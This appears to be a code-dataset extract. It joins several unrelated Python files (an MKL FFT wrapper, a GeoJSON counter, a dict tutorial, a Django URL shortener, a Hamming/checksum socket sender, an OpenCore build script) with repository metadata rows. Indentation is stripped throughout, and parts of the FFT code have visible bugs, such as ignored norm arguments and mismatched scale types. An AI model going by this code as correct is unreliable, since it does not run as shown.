mkl.DftiSetValue( Desc_Handle, DFTI_THREAD_LIMIT, _ctypes.c_int(fft_nthreads) )
# In-place FFT
mkl.DftiCommitDescriptor( Desc_Handle )
fft_func( Desc_Handle, a.ctypes.data_as(_ctypes.c_void_p) )
mkl.DftiFreeDescriptor( _ctypes.byref(Desc_Handle) )
return
def mkl_fft2(a, norm=None, direction='forward', out=None):
r"""Forward/backward 2D single- or double-precision FFT.
Uses the Intel MKL libraries distributed with Enthought Python.
Normalisation is different from Numpy!
By default, allocates new memory like 'a' for output data.
Returns the array containing output data.
See Also
--------
fft2, ifft2
"""
# convert input to complex data type if real (also memory copy)
if a.dtype != np.complex128 and a.dtype != np.complex64:
if a.dtype == np.int64 or a.dtype == np.uint64 or a.dtype == np.float64:
a = np.array(a, dtype=np.complex128)
else:
a = np.array(a, dtype=np.complex64)
# Configure in-place vs out-of-place
inplace = False
if out is a:
inplace = True
elif out is not None:
assert out.dtype == a.dtype
assert a.shape == out.shape
assert not np.may_share_memory(a, out)
else:
out = np.empty_like(a)
# Create the description handle
Desc_Handle = _ctypes.c_void_p(0)
dims = (_ctypes.c_long*2)(*a.shape)
if a.dtype == np.complex64:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_SINGLE, DFTI_COMPLEX, _ctypes.c_int(2), dims)
elif a.dtype == np.complex128:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_DOUBLE, DFTI_COMPLEX, _ctypes.c_int(2), dims)
# Set normalization factor
if norm == 'ortho':
scale = _ctypes.c_double(1.0 / np.sqrt(np.prod(a.shape)))
mkl.DftiSetValue(Desc_Handle, DFTI_FORWARD_SCALE, scale)
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
elif norm is None:
scale = _ctypes.c_double(1.0 / np.prod(a.shape))
mkl.DftiSetValue(Desc_Handle, DFTI_FORWARD_SCALE, _ctypes.c_double(1.0))
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
scale = _ctypes.c_float(0.)
mkl.DftiGetValue(Desc_Handle, DFTI_BACKWARD_SCALE, _ctypes.byref(scale))
# Set input strides if necessary
if not a.flags['C_CONTIGUOUS']:
in_strides = (_ctypes.c_long*3)(0, a.strides[0] // a.itemsize, a.strides[1] // a.itemsize)
mkl.DftiSetValue(Desc_Handle, DFTI_INPUT_STRIDES, _ctypes.byref(in_strides))
if direction == 'forward':
fft_func = mkl.DftiComputeForward
elif direction == 'backward':
fft_func = mkl.DftiComputeBackward
else:
assert False
if inplace:
# In-place FFT
mkl.DftiCommitDescriptor(Desc_Handle)
fft_func(Desc_Handle, a.ctypes.data_as(_ctypes.c_void_p) )
else:
# Not-in-place FFT
mkl.DftiSetValue(Desc_Handle, DFTI_PLACEMENT, DFTI_NOT_INPLACE)
# Set output strides if necessary
if not out.flags['C_CONTIGUOUS']:
out_strides = (_ctypes.c_long*3)(0, out.strides[0] // out.itemsize, out.strides[1] // out.itemsize)
mkl.DftiSetValue(Desc_Handle, DFTI_OUTPUT_STRIDES, _ctypes.byref(out_strides))
mkl.DftiCommitDescriptor(Desc_Handle)
fft_func(Desc_Handle, a.ctypes.data_as(_ctypes.c_void_p), out.ctypes.data_as(_ctypes.c_void_p) )
mkl.DftiFreeDescriptor(_ctypes.byref(Desc_Handle))
return out
def cce2full(A):
# Assume all square for now
N = A.shape
N_half = N[0]//2 + 1
out = np.empty((A.shape[0], A.shape[0]), dtype=A.dtype)
out[:, :N_half] = A
out[1:, N_half:] = np.rot90(A[1:, 1:-1], 2).conj()
# Complete the first row
out[0, N_half:] = A[0, -2:0:-1].conj()
return out
def mkl_rfft2(a, norm=None, direction='forward', out=None):
r"""Forward/backward single- or double-precision real-complex 2D FFT.
For more details:
See Also
--------
rfft2, irfft2
"""
assert (a.dtype == np.float32) or (a.dtype == np.float64)
out_type = np.complex128
if a.dtype == np.float32:
out_type = np.complex64
n = a.shape[1]
# Allocate memory if needed
if out is not None:
assert out.dtype == out_type
assert out.shape[1] == n // 2 + 1
assert not np.may_share_memory(a, out)
else:
size = list(a.shape)
size[1] = n // 2 + 1
out = np.empty(size, dtype=out_type)
# Create the description handle
Desc_Handle = _ctypes.c_void_p(0)
dims = (_ctypes.c_long*2)(*a.shape)
if a.dtype == np.float32:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_SINGLE, DFTI_REAL, _ctypes.c_int(2), dims)
elif a.dtype == np.float64:
mkl.DftiCreateDescriptor(_ctypes.byref(Desc_Handle), DFTI_DOUBLE, DFTI_REAL, _ctypes.c_int(2), dims)
# Set the storage type
mkl.DftiSetValue(Desc_Handle, DFTI_CONJUGATE_EVEN_STORAGE, DFTI_COMPLEX_COMPLEX)
# Set normalization factor
if norm == 'ortho':
if a.dtype == np.float32:
scale = _ctypes.c_float(1.0 / np.sqrt(np.prod(a.shape)))
else:
scale = _ctypes.c_double(1.0 / np.sqrt(np.prod(a.shape)))
mkl.DftiSetValue(Desc_Handle, DFTI_FORWARD_SCALE, scale)
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
elif norm is None:
if a.dtype == np.float64:
scale = _ctypes.c_float(1.0 / np.prod(a.shape))
else:
scale = _ctypes.c_double(1.0 / np.prod(a.shape))
mkl.DftiSetValue(Desc_Handle, DFTI_BACKWARD_SCALE, scale)
# For strides, the C type used *must* be long
in_strides = (_ctypes.c_long*3)(0, a.strides[0] // a.itemsize, a.strides[1] // a.itemsize)
out_strides = (_ctypes.c_long*3)(0, out.strides[0] // out.itemsize, out.strides[1] // out.itemsize)
# mkl.DftiSetValue(Desc_Handle, DFTI_INPUT_STRIDES, _ctypes.byref(in_strides))
mkl.DftiSetValue(Desc_Handle, DFTI_OUTPUT_STRIDES, _ctypes.byref(out_strides))
if direction == 'forward':
fft_func = mkl.DftiComputeForward
elif direction == 'backward':
fft_func = mkl.DftiComputeBackward
else:
assert False
# Not-in-place FFT
mkl.DftiSetValue(Desc_Handle, DFTI_PLACEMENT, DFTI_NOT_INPLACE)
# Set output strides if necessary
if not out.flags['C_CONTIGUOUS']:
out_strides = (_ctypes.c_int*3)(0, out.strides[0] // out.itemsize, out.strides[1] // out.itemsize)
mkl.DftiSetValue(Desc_Handle, DFTI_OUTPUT_STRIDES, _ctypes.byref(out_strides))
mkl.DftiCommitDescriptor(Desc_Handle)
fft_func(Desc_Handle, a.ctypes.data_as(_ctypes.c_void_p), out.ctypes.data_as(_ctypes.c_void_p) )
mkl.DftiFreeDescriptor(_ctypes.byref(Desc_Handle))
return out
def rfft(a, n=None, axis=-1, norm=None, out=None, scrambled=False):
r"""Computes the forward real-complex FFT using Intel's MKL routines.
Faster than mkl_fft.fft for real arrays.
Parameters
----------
a : ndarray
Input array to transform. It must be real.
n : int
Size of the transform.
axis : int
Axis along which the transform is computed (default is -1, summation
over the last axis).
norm : {None, 'ortho'}
Normalization of the transform. None (default) is same as numpy;
'ortho' gives an orthogonal (norm-preserving) transform.
out : ndarray
Points to the output array. Used when the array is preallocated or an
in-place transform is desired. Default is None, meaning that the
memory is allocated for the output array of the same shape as a.
scrambled: bool, optional (default False)
Allows the output of the FFT to be out of order if set to true. This
can sometimes lead to better performance.
Returns
-------
The transformed output array.
"""
return mkl_rfft(a, n=n, axis=axis, norm=norm, direction='forward', out=out, scrambled=scrambled)
def irfft(a, n=None, axis=-1, norm=None, out=None, scrambled=False):
r"""Computes the inverse complex-real FFT using Intel's MKL routines.
Faster than mkl_fft.ifft for conjugate-even arrays.
Parameters
----------
a : ndarray
Input array to transform. It should be stored in the conjugate-even
format (i.e. like output of rfft).
n : int
Size of the transform.
axis : int
Axis along which the transform is computed (default is -1, summation
over the last axis).
norm : {None, 'ortho'}
Normalization of the transform. None (default) is same as numpy;
'ortho' gives an orthogonal (norm-preserving) transform.
out : ndarray
Points to the output array. Used when the array is preallocated or an
in-place transform is desired. Default is None, meaning that the
memory is allocated for the output array of the same shape as a.
scrambled: bool, optional (default False)
Allows the input of the iFFT to be out of order if set to true. This
can sometimes lead to better performance.
Returns
-------
The transformed output array.
"""
return mkl_rfft(a, n=n, axis=axis, norm=norm, direction='backward', out=out, scrambled=scrambled)
def fft(a, n=None, axis=-1, norm=None, out=None, scrambled=False):
r"""Computes the forward FFT using Intel's MKL routines.
Parameters
----------
a : ndarray
Input array to transform.
n : int
Size of the transform.
axis : int
Axis along which the transform is computed (default is -1, summation
over the last axis).
norm : {None, 'ortho'}
Normalization of the transform. None (default) is same as numpy;
'ortho' gives an orthogonal (norm-preserving) transform.
out : ndarray
Points to the output array. Used when the array is preallocated or an
in-place transform is desired. Default is None, meaning that the
memory is allocated for the output array of the same shape as a.
scrambled: bool, optional (default False)
Allows the output of the FFT to be out of order if set to true. This
can sometimes lead to better performance.
Returns
-------
The transformed output array.
"""
return mkl_fft(a, n=n, axis=axis, norm=norm, direction='forward', out=out, scrambled=scrambled)
def ifft(a, n=None, axis=-1, norm=None, out=None, scrambled=False):
r"""Computes the inverse FFT using Intel's MKL routines.
Parameters
----------
a : ndarray
Input array to transform.
n : int
Size of the transform.
axis : int
Axis along which the transform is computed (default is -1, summation
over the last axis).
norm : {None, 'ortho'}
Normalization of the transform. None (default) is same as numpy;
'ortho' gives an orthogonal (norm-preserving) transform.
out : ndarray
Points to the output array. Used when the array is preallocated or an
in-place transform is desired. Default is None, meaning that the
memory is allocated for the output array of the same shape as a.
scrambled: bool, optional (default False)
Allows the input of the iFFT to be out of order if set to true. This
can sometimes lead to better performance.
Returns
-------
The transformed output array.
"""
return mkl_fft(a, n=n, axis=axis, norm=norm, direction='backward', out=out, scrambled=scrambled)
def fft2(a, norm=None, out=None):
r"""Computes the forward 2D FFT using Intel's MKL routines.
Parameters
----------
a : ndarray
Input array to transform.
norm : {None, 'ortho'}
Normalization of the transform. None (default) is same as numpy;
'ortho' gives an orthogonal (norm-preserving) transform.
out : ndarray
Points to the output array. Used when the array is preallocated or an
in-place transform is desired. Default is None, meaning that the
memory is allocated for the output array of the same shape as a.
Returns
-------
The transformed output array.
"""
proper_fft2(a, norm=norm, direction='forward')
return fftshift(a)
#return mkl_fft2(a, norm=norm, direction='forward', out=out)
def ifft2(a, norm=None, out=None):
r"""Computes the inverse 2D FFT using Intel's MKL routines.
Parameters
----------
a : ndarray
Input array to transform.
norm : {None, 'ortho'}
Normalization of the transform. None (default) is same as numpy;
'ortho' gives an orthogonal (norm-preserving) transform.
out : ndarray
Points to the output array. Used when the array is preallocated or an
in-place transform is desired. Default is None, meaning that the
memory is allocated for the output array of the same shape as a.
Returns
-------
The transformed output array.
"""
proper_fft2(a, norm=norm, direction='backward')
return fftshift(a)
#return mkl_fft2(a, norm=norm, direction='backward', out=out)
def rfft2(a, norm=None, out=None):
r"""Computes the forward real -> complex conjugate-even 2D FFT using
Intel's MKL routines.
Faster than mkl_fft.fft2 for real arrays.
Parameters
----------
a : ndarray
Input array to transform. It must be real.
norm : {None, 'ortho'}
Normalization of the transform. None (default) is same as numpy;
'ortho' gives an orthogonal (norm-preserving) transform.
out : ndarray
Points to the output array. Used when the array is preallocated or an
in-place transform is desired. Default is None, meaning that the
memory is allocated for the output array of the same shape as a.
Returns
-------
The transformed output array.
"""
return mkl_rfft2(a, norm=None, direction='forward', out=None)
def irfft2(a, norm=None, out=None):
r"""Computes the forward conjugate-even -> real 2D FFT using Intel's MKL
routines.
Faster than mkl_fft.ifft2 for conjugate-even arrays.
Parameters
----------
a : ndarray
Input array to transform. It should be stored in the conjugate-even
format (i.e. like output of rfft2).
norm : {None, 'ortho'}
Normalization of the transform. None (default) is same as numpy;
'ortho' gives an orthogonal (norm-preserving) transform.
out : ndarray
Points to the output array. Used when the array is preallocated or an
in-place transform is desired. Default is None, meaning that the
memory is allocated for the output array of the same shape as a.
Returns
-------
The transformed output array.
"""
return mkl_rfft2(a, norm=None, direction='backward', out=None)
def fftshift(x, additional_shift=None, axes=None):
"""
Shift the zero-frequency component to the center of the spectrum, or with
some additional offset from the center.
This is a more generic fork of `~numpy.fft.fftshift`, which doesn't support
additional shifts.
Parameters
----------
x : array_like
Input array.
additional_shift : list of length ``M``
Desired additional shifts in ``x`` and ``y`` directions respectively
axes : int or shape tuple, optional
Axes over which to shift. Default is None, which shifts all axes.
Returns
-------
y : `~numpy.ndarray`
The shifted array.
"""
tmp = np.asarray(x)
ndim = len(tmp.shape)
if axes is None:
axes = list(range(ndim))
elif isinstance(axes, integer_types):
axes = (axes,)
# If no additional shift is supplied, reproduce `numpy.fft.fftshift` result
if additional_shift is None:
additional_shift = [0, 0]
y = tmp
for k, extra_shift in zip(axes, additional_shift):
n = tmp.shape[k]
if (n+1)//2 - extra_shift < n:
p2 = (n+1)//2 - extra_shift
else:
p2 = abs(extra_shift) - (n+1)//2
mylist = np.concatenate((np.arange(p2, n), np.arange(0, p2)))
y = np.take(y, mylist, k)
return y
if __name__ == "__main__":
import time
n_iter = 200
N = 256
np.seterr(all='raise')
algos = {
'Numpy fft2 complex128': {'transform': np.fft.fft2, 'dtype': np.complex128},
'MKL fft2 complex128': {'transform': fft2, 'dtype': np.complex128},
'Numpy fft2 complex64': {'transform': np.fft.fft2, 'dtype': np.complex64},
'MKL fft2 complex64': {'transform': fft2, 'dtype': np.complex64},
'Numpy fft complex128': {'transform': np.fft.fft, 'dtype': np.complex128},
'MKL fft complex128': {'transform': fft, 'dtype': np.complex128},
'Numpy fft complex64': {'transform': np.fft.fft, 'dtype': np.complex64},
'MKL fft complex64': {'transform': fft, 'dtype': np.complex64},
'Numpy rfft float64': {'transform': np.fft.rfft, 'dtype': np.float64},
'MKL rfft float64': {'transform': rfft, 'dtype': np.float64},
'Numpy rfft float32': {'transform': np.fft.rfft, 'dtype': np.float32},
'MKL rfft float32': {'transform': rfft, 'dtype': np.float32},
}
for algo in algos.keys():
A = algos[algo]['dtype'](np.random.randn(N, N))
#C = np.zeros((N, N), dtype='complex128')
start_time = time.time()
for i in range(n_iter):
algos[algo]['transform'](A)
total = time.time() - start_time
print(algo,":")
print("--- %s seconds ---" % total)
| UTF-8 | Python | false | false | 30,947 | py | 82 | mkl_fft.py | 74 | 0.620836 | 0.607943 | 0 | 891 | 33.73064 | 115 |
AntKazakovv/GeoJsonAnalyzer | 12,189,117,210,718 | 8598f43192d604ea459dfb5dc7b0c14704c7bcb1 | 636419f778f1551e8a3744be0192a88037093352 | /src/geo_tools.py | e80e4cdb218e4f50bd5e326d67ddb37203c2ec39 | []
| no_license | https://github.com/AntKazakovv/GeoJsonAnalyzer | 6c2537214bdc6229dbea5a93017115999c613418 | 9d7fdbca5202d0f52e993c67791c5d554aab4977 | refs/heads/master | 2023-03-24T17:37:20.081178 | 2020-06-03T09:24:09 | 2020-06-03T09:24:09 | 269,043,003 | 0 | 0 | null | false | 2021-03-20T04:11:16 | 2020-06-03T09:16:25 | 2020-06-03T09:24:20 | 2021-03-20T04:11:15 | 2 | 0 | 0 | 1 | Python | false | false | # def checkCoordsPoint(list):
import geojson
dump = """{
"type": "FeatureCollection",
"crs": {
"type": "name",
"properties": {
"name": "EPSG:3857"
}
},
"features": [{
"type": "Feature",
"geometry": {
"type": "Point",
"coordinates": [0, 0]
}
}, {
"type": "Feature",
"geometry": {
"type": "LineString",
"coordinates": [[4e6, -2e6], [8e6, 2e6]]
}
}, {
"type": "Feature",
"geometry": {
"type": "LineString",
"coordinates": [[4e6, 2e6], [8e6, -2e6]]
}
}, {
"type": "Feature",
"geometry": {
"type": "Polygon",
"coordinates": [[[-5e6, -1e6], [-4e6, 1e6], [-3e6, -1e6]]]
}
}, {
"type": "Feature",
"geometry": {
"type": "MultiLineString",
"coordinates": [
[[-1e6, -7.5e5], [-1e6, 7.5e5]],
[[1e6, -7.5e5], [1e6, 7.5e5]],
[[-7.5e5, -1e6], [7.5e5, -1e6]],
[[-7.5e5, 1e6], [7.5e5, 1e6]]
]
}
}, {
"type": "Feature",
"geometry": {
"type": "MultiPolygon",
"coordinates": [
[[[-5e6, 6e6], [-5e6, 8e6], [-3e6, 8e6], [-3e6, 6e6]]],
[[[-2e6, 6e6], [-2e6, 8e6], [0, 8e6], [0, 6e6]]],
[[[1e6, 6e6], [1e6, 8e6], [3e6, 8e6], [3e6, 6e6]]]
]
}
}, {
"type": "Feature",
"geometry": {
"type": "GeometryCollection",
"geometries": [{
"type": "LineString",
"coordinates": [[-5e6, -5e6], [0, -5e6]]
}, {
"type": "Point",
"coordinates": [4e6, -5e6]
}, {
"type": "Polygon",
"coordinates": [[[1e6, -6e6], [2e6, -4e6], [3e6, -6e6]]]
}]
}
}]
}"""
def toGeoJson(obj):
try:
return geojson.loads(obj)
except TypeError as e:
return {"error": "не удалось загрузить geoJson, документ не валиден"}
def getNumberObjects(geoJson):
if geoJson.get("error") and geoJson["error"]:
return geoJson
features = geoJson.features
finalStruct = {}
for item in features:
if finalStruct.get(item.geometry.type):
finalStruct[item.geometry.type] += 1
else:
finalStruct[item.geometry.type] = 1
try:
item.geometry.geometries
for i in item.geometry.geometries:
if finalStruct.get(i.type):
finalStruct[i.type] += 1
else:
finalStruct[i.type] = 1
except:
pass
return finalStruct
if __name__ == "__main__":
f = toGeoJson(dump)
print(getNumberObjects(f)) | UTF-8 | Python | false | false | 2,604 | py | 3 | geo_tools.py | 2 | 0.464772 | 0.407552 | 0 | 106 | 23.245283 | 77 |
folkol/tutorials | 13,048,110,691,827 | e0bc41ce8635bfbfe483d9b8abfd771b5c81901b | 81ec35443bc2567118aece66254c021e73f960d1 | /python3/5.5.dictionaries.py | ed9c74be7c6566ccce9fafab234d7bea865f1114 | []
| no_license | https://github.com/folkol/tutorials | 95f1d641843cc26c04a79f74270721c7de4ac628 | 962b0fd89dac244e7f9dcb03773a25d96413fb0b | refs/heads/master | 2023-08-17T18:50:18.358911 | 2023-08-02T20:46:53 | 2023-08-02T20:47:35 | 66,833,956 | 0 | 0 | null | false | 2023-09-05T03:40:46 | 2016-08-29T10:26:01 | 2021-11-24T09:15:13 | 2023-09-05T03:40:45 | 9,057 | 0 | 0 | 57 | JavaScript | false | false | empty_dict = {}
d = {'foo': 1, 'bar': 'baz', 'quz': []}
print(d)
print('foo' in d) # is key in dict. Sugar for b.__contains__(a)
del d['foo'] # Remove key from dict
print('foo' in d) # is key in dict
d['foo'] = 1
print(d['foo'])
d['foo'] = 2
print(d['foo'])
print(list(d.keys()))
# print(d['asdf']) # KeyError
# d[('my', ['list'])] = 'foo' # List is not hashable, so this tuple is not hashable...
d['asdf'] = 'wut'
print(d)
for k, v in d.items():
print(k, v)
print('for k in d.keys()')
for k in d.keys():
print(k)
print('for k in d') # loop over keys
for k in d:
print(k)
print('for v in d.values()')
for v in d.values():
print(v)
print(dict([(1, 2), ('a', 'b')])) # dict from list of pairs
print({x: x ** x for x in range(10)}) # dict comprehension
print(dict(key1=1234, key2=122, key3='foo')) # dict from kwargs
from collections import defaultdict
def recursive_defaultdict():
return defaultdict(recursive_defaultdict)
dd = recursive_defaultdict()
dd['foo']['bar']['baz'] = 'qux'
print(dd)
print(dd['foo']['bar']['baz'])
print(dd.items())
| UTF-8 | Python | false | false | 1,087 | py | 188 | 5.5.dictionaries.py | 115 | 0.593376 | 0.577737 | 0 | 54 | 19.12963 | 87 |
Faiznurullah/HacktoberFest-Python | 2,044,404,454,916 | 542250becb021947a302004cea48bbc457d08618 | a7b4e777e5e08194112594b6d4cde029c181f5a3 | /codes/django-url-shortener-rest-api/api/views.py | 651162451958997531ed639e7cf762d7f022bd73 | []
| no_license | https://github.com/Faiznurullah/HacktoberFest-Python | b1407248d95e178a131c7f350ecccf7ae8aa7e5a | b3615869f98696de784dcc5335d9e070e05bfb00 | refs/heads/main | 2023-08-26T14:14:32.576035 | 2021-10-01T14:41:45 | 2021-10-01T14:41:45 | 412,502,808 | 1 | 1 | null | true | 2021-10-10T01:25:37 | 2021-10-01T14:38:11 | 2021-10-01T14:41:53 | 2021-10-01T14:41:45 | 222,376 | 0 | 1 | 1 | Jupyter Notebook | false | false | from django.http.response import Http404, HttpResponseRedirect
from django.http import HttpResponse, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from rest_framework.parsers import JSONParser
from .models import ShortenedURL
from .serializers import ShortenedURLSerializer
def home(request):
"""Get Status of the API"""
response_status = {'text': "API is up"}
return JsonResponse(response_status, status=200)
@csrf_exempt
def shortenedURL_list(request):
"""List all shortenedURLs, or create a new shortenedURL."""
if request.method == 'GET':
shortenedURLs = ShortenedURL.objects.all()
serializer = ShortenedURLSerializer(shortenedURLs, many=True)
return JsonResponse(serializer.data, safe=False)
if request.method == 'POST':
data = JSONParser().parse(request)
serializer = ShortenedURLSerializer(data=data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data, status=201)
return JsonResponse(serializer.errors, status=400)
return HttpResponse(status=400)
@csrf_exempt
def shortenedURL_detail(request, short_url):
"""Retrieve, update or delete a code shortenedURL."""
try:
shortenedURL = ShortenedURL.objects.get(short_url=short_url)
if request.method == 'GET':
serializer = ShortenedURLSerializer(shortenedURL)
return JsonResponse(serializer.data)
if request.method == 'PUT':
data = JSONParser().parse(request)
serializer = ShortenedURLSerializer(shortenedURL, data=data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data)
return JsonResponse(serializer.errors, status=400)
if request.method == 'DELETE':
shortenedURL.delete()
return HttpResponse(status=204)
except ShortenedURL.DoesNotExist:
return HttpResponse(status=404)
def redirect_view(request, short_url):
"""Redirect the short URL to link URL"""
try:
if request.method == 'GET':
shortener = ShortenedURL.objects.get(short_url=short_url)
shortener.times_visited += 1
shortener.save()
return HttpResponseRedirect(shortener.long_url)
except ShortenedURL.DoesNotExist:
return HttpResponse(status=404)
| UTF-8 | Python | false | false | 2,410 | py | 50 | views.py | 22 | 0.675104 | 0.663485 | 0 | 66 | 35.515152 | 72 |
JKK5/BOJ | 2,568,390,460,288 | 1e22c6afb4494747972cb31a371fece51e5f7b42 | 0291d961a1406802e4ff52a5dd742f08b9030583 | /lv5/2.py | 930c949318e72fea5c37ca1478690b3a16113d35 | []
| no_license | https://github.com/JKK5/BOJ | d607a2a8d4adc498345fb62ef1cd10c39c4c5c2f | 0ef1d302c14cd4514647ea23dd8b650af6bca6c8 | refs/heads/main | 2023-02-16T07:09:42.586297 | 2021-01-17T13:17:46 | 2021-01-17T13:17:46 | 328,104,093 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # lst = []
# for i in range(9):
# lst.append(int(input()))
# print(max(lst), lst.index(max(lst)) + 1)
lst = [int(input()) for i in range(9)]
print(max(lst), lst.index(max(lst)) + 1)
| UTF-8 | Python | false | false | 189 | py | 26 | 2.py | 26 | 0.566138 | 0.544974 | 0 | 9 | 20 | 42 |
Est17256/LAB2-Redes-Deteccion-Errores | 13,056,700,621,192 | 88fb264a29eeeab89e3fe6565ed3a360b7aea574 | 60a26ca7fb99965fc572146d4e60d2134f71d5f6 | /emisor.py | f9d0b3a6e70683901a1c3267d4d4450289244054 | []
| no_license | https://github.com/Est17256/LAB2-Redes-Deteccion-Errores | 299f08fdbe737a49bd715ae0131ceafde61dffdc | 31e482ae6c2dcb6e2d45b3a02d586cf85e00891e | refs/heads/master | 2022-11-26T05:42:29.646040 | 2020-08-06T21:08:27 | 2020-08-06T21:08:27 | 284,817,363 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | ### Emisor del mensaje
import re
import socket
import pickle
### Funciones utilizadas para la implementacion de Hamming
def VerRdn(m):
for i in range(m):
if(2**i >= m + i + 1):
return i
def PosRdn(data, r):
j = 0
k = 1
m = len(data)
res = ''
for i in range(1, m + r+1):
if(i == 2**j):
res = res + '0'
j += 1
else:
res = res + data[-1 * k]
k += 1
return res[::-1]
def VerPrd(dat, r):
n = len(dat)
for i in range(r):
val = 0
for j in range(1, n + 1):
if(j & (2**i) == (2**i)):
val = val ^ int(dat[-1 * j])
dat = dat[:n-(2**i)] + str(val) + dat[n-(2**i)+1:]
return dat
def VerFnl(dat, nr):
n = len(dat)
res = 0
for i in range(nr):
val = 0
for j in range(1, n + 1):
if(j & (2**i) == (2**i)):
val = val ^ int(dat[-1 * j])
res = res + val*(10**i)
return int(str(res), 2)
### Funciones utilizadas para la implementacion de checksum
def sumarSegmentos(segmento1, segmento2):
carrier = '0'
suma = ''
for item in range(7,-1,-1):
a = int(segmento1[item])
b = int(segmento2[item])
resultadoAB = a + b + int(carrier)
if resultadoAB == 0:
suma = '0' + suma
carrier = '0'
elif resultadoAB == 1:
suma = '1' + suma
carrier = '0'
elif resultadoAB == 2:
suma = '0' + suma
carrier = '1'
elif resultadoAB == 3:
suma = '1' + suma
carrier = '1'
if carrier != '0':
suma = carrier + suma
return suma
def emisionCheckSum(binario):
n = 8
arrayBinary = [binario[i:i+n] for i in range(0, len(binario), n)]
sumaSegmentos = '00000000'
for i in arrayBinary:
sumaSegmentos = sumarSegmentos(sumaSegmentos, i)
if len(sumaSegmentos) > 8:
sumaSegmentos = sumaSegmentos[1:]
sumaSegmentos = sumarSegmentos(sumaSegmentos, '00000001')
return xor(sumaSegmentos)
def xor(segmento):
resultado = ''
for i in segmento:
if i == '0':
resultado = resultado + '1'
else:
resultado = resultado + '0'
return resultado
### Conexion por Socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('127.0.0.1',9000))
sock.listen(1)
conexion, direccion = sock.accept()
print("Conexion relaizada con exito de la direccion", str(direccion))
### Procesamiento de capas del mensaje a enviar
Mensaje=input("Ingrese el mensaje: ")
mensajeEnviar = ''
### Convertir mensaje de STR -> BIN
Binario=' '.join(map(bin,bytearray(Mensaje,'utf8')))
Binario=Binario.replace("b","")
Binario=Binario.replace(" ","")
print("Mensaje en binario:", Binario)
binarioDeteccion = Binario
opcionita=int(input("Cual algoritmo desea probar, 1.Hamming 2.Checksum (Seleccion un numero): "))
if opcionita == 1:
m = len(Binario)
r = VerRdn(m)
dat = PosRdn(Binario, r)
dat = VerPrd(dat, r)
print(dat)
print(dat)
### Se ingresa el ruido al mensaje
ruido=int(input("Desea agregar ruido al mensaje, 1.Si 2.No (Seleccion un numero): "))
if ruido==1:
Lista=list(dat)
lista2=[]
print(Lista)
intervalo=int(input("Ingrese el intervalo del ruido: "))
intervalo2=0
for i in range(len(dat)):
intervalo2+=1
if intervalo2==intervalo:
lista2.append("1")
intervalo2=0
else:
lista2.append(Lista[i])
objeto=""
objeto=objeto.join(lista2)
print("Ruido")
print(objeto)
print("Ruido")
dat = objeto
### Utilizamos pickle para hacer provecho del uso del paquete bitarray
dat = '0' + dat + ',' + str(r)
mensajeEnviar = pickle.dumps(dat)
else:
dat = Binario
### Se ingresa el ruido al mensaje
ruido=int(input("Desea agregar ruido al mensaje, 1.Si 2.No (Seleccion un numero): "))
if ruido==1:
Lista=list(Binario)
lista2=[]
print(Lista)
intervalo=int(input("Ingrese el intervalo del ruido: "))
intervalo2=0
for i in range(len(Binario)):
intervalo2+=1
if intervalo2==intervalo:
lista2.append("1")
intervalo2=0
else:
lista2.append(Lista[i])
objeto=""
objeto=objeto.join(lista2)
print("Ruido")
print(objeto)
print("Ruido")
dat = objeto
complemento = emisionCheckSum(dat)
mensaje = '1' + Binario + complemento
### Utilizamos pickle para hacer provecho del uso del paquete bitarray
mensajeEnviar = pickle.dumps(mensaje)
### Se envia el objeto mensaje
conexion.send(mensajeEnviar)
conexion.close()
| UTF-8 | Python | false | false | 4,945 | py | 4 | emisor.py | 3 | 0.542164 | 0.517492 | 0 | 181 | 26.320442 | 97 |
dortania/Opencore-Legacy-Patcher | 15,607,911,165,855 | dd39415c7c57ca212c8a644e3939c8c6423c8ee6 | 7d13c03810d893447ca5b2b59c3cf46d835abad0 | /resources/build/build.py | 07615dafd78e3ee90b14b48d4e8c6a87628dc8c2 | []
| no_license | https://github.com/dortania/Opencore-Legacy-Patcher | fdcd3dfec0ce59e9cd8f5a0a1108c9d264b28843 | 961c9c7a683ea9860b704523cc04d65dc4fa440c | refs/heads/main | 2023-03-20T03:22:15.819393 | 2023-03-19T17:35:14 | 2023-03-19T17:35:14 | 315,490,189 | 64 | 15 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Class for generating OpenCore Configurations tailored for Macs
# Copyright (C) 2020-2022, Dhinak G, Mykola Grymalyuk
import copy
import pickle
import plistlib
import shutil
import zipfile
from pathlib import Path
from datetime import date
import logging
from resources import constants, utilities
from resources.build import bluetooth, firmware, graphics_audio, support, storage, smbios, security, misc
from resources.build.networking import wired, wireless
def rmtree_handler(func, path, exc_info):
if exc_info[0] == FileNotFoundError:
return
raise # pylint: disable=misplaced-bare-raise
class build_opencore:
def __init__(self, model, versions):
self.model = model
self.config = None
self.constants: constants.Constants = versions
def build_efi(self):
utilities.cls()
if not self.constants.custom_model:
logging.info(f"Building Configuration on model: {self.model}")
else:
logging.info(f"Building Configuration for external model: {self.model}")
self.generate_base()
self.set_revision()
# Set Lilu and co.
support.build_support(self.model, self.constants, self.config).enable_kext("Lilu.kext", self.constants.lilu_version, self.constants.lilu_path)
self.config["Kernel"]["Quirks"]["DisableLinkeditJettison"] = True
# Call support functions
firmware.build_firmware(self.model, self.constants, self.config).build()
wired.build_wired(self.model, self.constants, self.config).build()
wireless.build_wireless(self.model, self.constants, self.config).build()
graphics_audio.build_graphics_audio(self.model, self.constants, self.config).build()
bluetooth.build_bluetooth(self.model, self.constants, self.config).build()
storage.build_storage(self.model, self.constants, self.config).build()
smbios.build_smbios(self.model, self.constants, self.config).build()
security.build_security(self.model, self.constants, self.config).build()
misc.build_misc(self.model, self.constants, self.config).build()
# Work-around ocvalidate
if self.constants.validate is False:
logging.info("- Adding bootmgfw.efi BlessOverride")
